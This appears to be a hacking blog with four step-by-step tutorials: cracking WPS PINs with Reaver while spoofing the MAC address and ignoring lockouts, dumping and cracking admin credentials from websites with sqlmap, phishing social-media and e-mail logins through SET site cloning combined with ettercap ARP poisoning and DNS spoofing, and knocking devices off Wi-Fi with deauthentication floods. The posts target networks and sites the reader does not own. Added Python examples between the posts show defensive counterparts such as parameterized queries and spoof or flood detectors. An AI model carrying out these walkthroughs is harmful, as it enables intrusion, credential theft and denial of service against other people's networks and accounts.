Monday, 23 December 2013

How to crack WPS-enabled networks:

REAVER: WPS SYSTEMS (Wi-Fi Protected Setup)

(tool included with backtrack/kali)

NOTE: try to spoof your MAC address before running reaver; sometimes it won't work, but at least try to spoof!!!

open a terminal and type:

1) ifconfig wlan0 down

2) macchanger -r wlan0

3) ifconfig wlan0 up

type: ifconfig (to make sure your MAC was spoofed)

REAVER:

open a terminal and type:

1) airmon-ng start wlan0 (*wlan0 or your current interface)

NOTE: this will create the monitor-mode interface mon0:

spoof mon0:

ifconfig mon0 down

macchanger -r mon0

ifconfig mon0 up

2) find a target WPS-enabled network: open a new terminal and type:

wash -i mon0

3) start attack:

reaver -i (interface) -c (channel #) -b (target bssid) -vv

example: reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv

4) now let reaver run until the PIN is cracked;
this could take anywhere from 4 - 24 hours

---------------------------------
notes:

1) if reaver hangs, press Ctrl+C (this saves the current session),
close the terminal and restart reaver;
at times you may need to reboot your computer.

2) command line examples:

reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

-S = use small DH keys (faster cracking attempts)
-N = don't send NACKs when out-of-order packets are received
-L = ignore locked WPS state
-d 15 = delay 15 seconds between PIN attempts; you can choose your own delay
-r 3:15 = recurring delay: sleep 15 seconds after every 3 attempts;
you can choose your own time and number of attempts
-T .5 = message timeout period, measured in seconds
-x 360 = sleep 360 seconds after 10 unexpected failures

good command line:

reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv -S -N -L -x 60
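Added example, not from the post or from the reaver project: a parser for wash's scan table (column layout assumed from the wash shipped with reaver 1.4 on BackTrack/Kali: BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID) that turns a scan into a list of your own access points that still have WPS on, the setting the attack above depends on. The sample output, the `parse_wash` and `wps_findings` names and the second BSSID are constructed.

```python
import re

# Row pattern for the wash 1.4 table (assumed layout; header and separator lines will not match).
WASH_ROW = re.compile(r'^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s+(.*)$')

def parse_wash(output):
    """Turn wash's table into one dict per access point. Lines that do not match the
    row pattern (banner, column header, dashes) are skipped. ESSIDs may contain spaces."""
    aps = []
    for line in output.splitlines():
        m = WASH_ROW.match(line.strip())
        if m:
            bssid, channel, rssi, version, locked, essid = m.groups()
            aps.append({'bssid': bssid.upper(), 'channel': int(channel), 'rssi': int(rssi),
                        'wps_version': version, 'locked': locked == 'Yes', 'essid': essid.strip()})
    return aps

def wps_findings(aps, owned_bssids):
    """Audit only the APs you are responsible for. Every row wash prints has WPS enabled;
    an unlocked one is open to the external-registrar PIN guessing reaver performs, a
    locked one merely slows it down. The fix in both cases is to disable WPS on the AP."""
    owned = {b.upper() for b in owned_bssids}
    return [(ap['bssid'], ap['essid'], 'MEDIUM' if ap['locked'] else 'HIGH', 'disable WPS')
            for ap in aps if ap['bssid'] in owned]

# Constructed wash output in the assumed 1.4 layout (not a real scan).
SAMPLE_WASH = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
-----------------------------------------------------------------------------------------
F6:00:14:D4:11:D0       7            -45        1.0               No                Home Net
00:11:22:33:44:55       1            -70        1.0               Yes               Office
"""
```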

Posted on 08:12 by Unknown


Today we are here to show a method named SQL injection, with the help of which you can hack websites.
Let's start:

(backtrack/kali linux)

first find the admin page of the site you want to inject, using an online service:

scan.subhashdasyam.com/admin-panel-finder.php

paste the name of the site into the "enter url" field and click dump

select the admin page, then search for admin credentials using sqlmap:

OR

www.sc0rpion.ir/af to find login page online

FINDING ADMIN LOGIN (2):

www.site.com/admin
www.site.com/login
www.site.com/wp-admin.php
www.site.com/administrator
www.site.com/admin.php


^(optional)^
-------------------------------------------------------------------------
SQL INJECTION : SQLMAP :

1) open a new terminal and type:

sqlmap -u (paste web-site) --dbs

2) after the scan, look at the available databases

3) type in:

sqlmap -u (target site) -D (database) --tables 

4) after the scan, copy the admin table name (shown in white letters) and type:

sqlmap -u (target site) -D (database) -T (*admin) --columns

5) after the scan type:

sqlmap -u (target site) -D (database) -T (*admin) -C (*username) --dump

(look for the username column, shown in white lettering)

6) after the scan type:

sqlmap -u (target site) -D (database) -T (*admin) -C (*password) --dump

(the password will be in white lettering; it is usually stored as a hash, not plaintext, and will need to be cracked or looked up)

7) google decrypt hash online: (md5decrypter...etc...) 

(* = substitute the table or column name you found)

-----------------------------------------------------------------
logs stored in : /usr/share/sqlmap/output
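The enumeration above only works because the target's code splices the URL parameter into its SQL text. As an added example (not from the post), here is the same admin lookup written the vulnerable way and the parameterized way against an in-memory SQLite table, plus the salted, slow password hashing that turns step 7's online hash lookup into a dead end. Table rows, passwords and the function names are constructed.

```python
import hashlib
import os
import sqlite3

def hash_password(password, salt=None, rounds=600_000):
    """Salted PBKDF2-HMAC-SHA256 in a self-describing string. Unlike the bare MD5 the post
    expects to find in the dump, there is no lookup-table shortcut: every guess costs the
    full iteration count and the per-user salt defeats precomputed tables."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, rounds)
    return f'pbkdf2_sha256${rounds}${salt.hex()}${digest.hex()}'

def verify_password(stored, candidate):
    """Recompute with the stored salt and rounds; constant format makes rotation easy."""
    _, rounds, salt_hex, _ = stored.split('$')
    return hash_password(candidate, bytes.fromhex(salt_hex), int(rounds)) == stored

def make_db():
    """In-memory stand-in for the admin table the post enumerates (constructed rows)."""
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE admin (username TEXT, password TEXT)')
    con.executemany('INSERT INTO admin VALUES (?, ?)',
                    [('alice', hash_password('correct horse')),
                     ('bob', hash_password('battery staple'))])
    return con

def find_admin_vulnerable(con, username):
    # BAD: the request parameter is pasted into the SQL text, so a quote inside it
    # rewrites the query. This is the class of code sqlmap's --dbs/--tables/--dump chain exploits.
    sql = "SELECT username FROM admin WHERE username = '%s'" % username
    return [row[0] for row in con.execute(sql)]

def find_admin_safe(con, username):
    # GOOD: a bound parameter is always data, never SQL, whatever characters it contains.
    sql = "SELECT username FROM admin WHERE username = ?"
    return [row[0] for row in con.execute(sql, (username,))]
```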

Posted on 08:07 by Unknown


Today we are here to show a method called phishing, by which you can hack any social media user's account and control it.
Let's start:

NOTE: before attempting this, open a terminal and type:

leafpad /etc/ettercap/etter.conf

then delete the # signs in front of these two lines:

# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
# redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

it should look like this:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

SE-TOOLKIT AND ETTERCAP: PHISHING 1:

1) open se-toolkit (set)

2) press options in this order: 1,2,3,2

3) enter your IP address

4) type in the desired web-site to clone

NOTE: to capture login credentials of e-mail sites, be sure to type in the exact address of the login screen, not the home page!!

5) open a new terminal and type in this command :

leafpad /etc/ettercap/etter.dns 

or

nano /etc/ettercap/etter.dns

6) replace the 3 example entries (the microsoft.com lines and their IPs) with the page you want to spoof, then save:

microsoft.com A 192.168.1.1
*.microsoft.com A 192.168.1.1
www.microsoft.com PTR 192.168.1.1

^ CHANGE ^
EXAMPLE:

facebook.com A (your i.p)
*.facebook.com A (your i.p.)
www.facebook.com PTR (your i.p.)

7) open Ettercap (GUI): click sniff > unified sniff and select the interface; click hosts > scan hosts, then hosts > list hosts;
add the gateway IP as target #1 and all target IPs as target #2; click plugins and select dns_spoof; click MITM > arp poison
(select "remote" for multiple devices connected to the network, or "one way" for one device on the network); click start sniffing

now be patient, wait for targets to log in, and keep an eye on SE-TOOLKIT for credential info!

(also ettercap 0.8.0 now captures any login and password credentials!)

NOTES: 

1) when changing the page to spoof you have to exit ettercap and SET, then disconnect from the network,
edit the ettercap config and redo the above steps

2) recommended e-mail spoofs:

yahoo.com A 
*.yahoo.com A 
www.yahoo.com PTR

facebook.com A 
*.facebook.com A 
www.facebook.com PTR 

aol.com A 
*.aol.com A 
www.aol.com PTR 

e-mail logins:

https://my.screenname.aol.com/ A 

https://login.yahoo.com/ A

https://accounts.google.com/ A

3) where SE-TOOLKIT info is stored (shown after Ctrl+C is pressed):

File exported to /root/.set/reports/XXXXX.html for your reading pleasure...
[*] File in XML format exported to /root/.set/reports/

also look in:

file system /usr/share/set/src/logs/
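What a defender watching that LAN sees, as an added example that is not part of the post: ARP poisoning makes the gateway's IP suddenly answer with a new MAC and one MAC claim several IPs, and an etter.dns rewrite like the one above makes a public name resolve to a LAN address. The ARP records and addresses are constructed, and `detect_arp_spoofing` and `suspicious_dns_answer` are hypothetical names.

```python
import ipaddress
from collections import defaultdict

def suspicious_dns_answer(name, answer_ip, lan_names=()):
    """True when a name you do not host yourself resolves to a private, loopback or
    link-local address: a public site pointing at a LAN host is exactly what an
    etter.dns entry such as `facebook.com A 192.168.1.x` produces."""
    ip = ipaddress.ip_address(answer_ip)
    hosted = name.lower().rstrip('.') in {n.lower().rstrip('.') for n in lan_names}
    return not hosted and (ip.is_private or ip.is_loopback or ip.is_link_local)

def detect_arp_spoofing(replies, gateway_ip):
    """replies: iterable of (timestamp, sender_ip, sender_mac) taken from ARP replies seen
    on the segment. Alerts when an IP's MAC changes (HIGH for the gateway, which is
    target #1 in the post) and when one MAC starts claiming a second IP, which is what
    poisoning the gateway plus the stations looks like from the wire."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            sev = 'HIGH' if ip == gateway_ip else 'MEDIUM'
            alerts.append((ts, sev, f'{ip} moved from {prev} to {mac}'))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append((ts, 'HIGH', f'{mac} now claims {sorted(mac_to_ips[mac])}'))
    return alerts

def sample_arp_replies():
    """Constructed ARP replies: a normal gateway and station, then a third MAC answering
    for both of them (the pattern of a remote ARP poison)."""
    gw, sta, atk = '08:00:27:aa:00:01', '08:00:27:aa:00:20', '00:0c:29:ff:ff:ff'
    return [(0.0, '192.168.1.1', gw), (0.1, '192.168.1.20', sta),
            (5.0, '192.168.1.1', atk), (5.0, '192.168.1.20', atk), (6.0, '192.168.1.1', atk)]
```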

Posted on 08:01 by Unknown


Today I'm going to share this tutorial on how to DOS network devices with deauthentication.
Let's start:
(using backtrack/kali linux)

(networks within reach of your computer)

Disconnect from any network you are on;
this attack works fully while you are offline

open a terminal and type the following commands :

airmon-ng start wlan0 (or type your current interface, usually wlan0)

airodump-ng mon0

(now airodump-ng will scan for networks)

when the target network's MAC address (BSSID) is found, type:

airodump-ng -c (target's channel #) -w (file name to write) --bssid (type bssid) --ivs mon0

example: airodump-ng -c 7 -w ABC123 --bssid F6:B4:22:0D:14:B2 --ivs mon0

(the above command will list the target network's currently active devices)

Now open a new terminal (keep the other terminal open) and type:

aireplay-ng --deauth (# of deauths to send) -a (type bssid) -c (type station) mon0

example: aireplay-ng --deauth 1 -a F6:B4:22:0D:14:B2 -c D0:22:14:F8:00:D4 mon0

(Note: keep entering the above command until the network's correct channel is found;
you will be able to tell whether the command is running or not)
(Note: -c is actually the MAC address of a currently active device on the network)
(Note: for a long-term DOS, use 1000000's of deauths)

DOS IS ENGAGED!!!

Note: you can open what seems like endless terminals, one aireplay-ng command
for each different device MAC address on the target network. After starting
the attack you can click back on the first terminal to check whether the
device's power reading is at 0 (which is the goal), and you can also do multiple networks at once.
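The aireplay-ng flood above is easy to recognise on the air, because a genuine client leaving sends one or two deauthentication frames while the attack sends hundreds per second for one BSSID. As an added example (not from the post or from the aircrack-ng project), here is a minimal parser for the fixed 802.11 management header and a sliding-window detector over it; the frames are constructed in code, the BSSID and station addresses are the ones from the post's example, and `parse_mgmt_frame` and `detect_deauth_flood` are hypothetical names.

```python
import struct
from collections import defaultdict

DEAUTH = 12  # management-frame subtype 12 = Deauthentication (frame-control byte 0xC0)

def parse_mgmt_frame(raw):
    """Parse a bare 802.11 management frame (radiotap header already stripped).
    Returns (subtype, dst, src, bssid, reason) or None for non-management/short frames;
    reason is only present for disassociation (10) and deauthentication (12)."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:
        return None
    mac = lambda b: ':'.join(f'{x:02x}' for x in b)
    reason = struct.unpack_from('<H', raw, 24)[0] if subtype in (10, 12) and len(raw) >= 26 else None
    return subtype, mac(raw[4:10]), mac(raw[10:16]), mac(raw[16:22]), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp, raw_frame). Raises one alert per BSSID the first
    time `threshold` deauths for that BSSID fall inside `window` seconds."""
    recent, alerted, alerts = defaultdict(list), set(), []
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if not parsed or parsed[0] != DEAUTH:
            continue
        bssid = parsed[3]
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # slide the window; q always holds the current ts
            q.pop(0)
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({'bssid': bssid, 'start': q[0], 'count': len(q), 'reason': parsed[4]})
    return alerts

def sample_deauth(dst, src, bssid, reason=7):
    """Constructed 26-byte deauth frame used only as parser input (sample data, never sent)."""
    mac = lambda s: bytes.fromhex(s.replace(':', ''))
    return bytes([0xC0, 0x00, 0x3A, 0x01]) + mac(dst) + mac(src) + mac(bssid) + b'\x00\x00' + struct.pack('<H', reason)

def sample_capture():
    """Constructed capture: a beacon, one genuine deauth from another AP, then 12 deauths
    in 0.55 s from the post's example BSSID to the post's example station."""
    ap, sta = 'F6:B4:22:0D:14:B2', 'D0:22:14:F8:00:D4'
    frames = [(0.0, bytes([0x80, 0x00]) + bytes(22))]  # beacon: parsed but not counted
    frames.append((0.5, sample_deauth(sta, '02:AA:BB:CC:DD:EE', '02:AA:BB:CC:DD:EE', reason=3)))
    frames += [(10.0 + 0.05 * i, sample_deauth(sta, ap, ap)) for i in range(12)]
    return frames
```

Where the access point and clients support 802.11w (Protected Management Frames), forged deauthentication frames fail the integrity check and are dropped, which is the actual fix; this detector is for the unprotected networks the post describes.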

Posted on 07:46 by Unknown
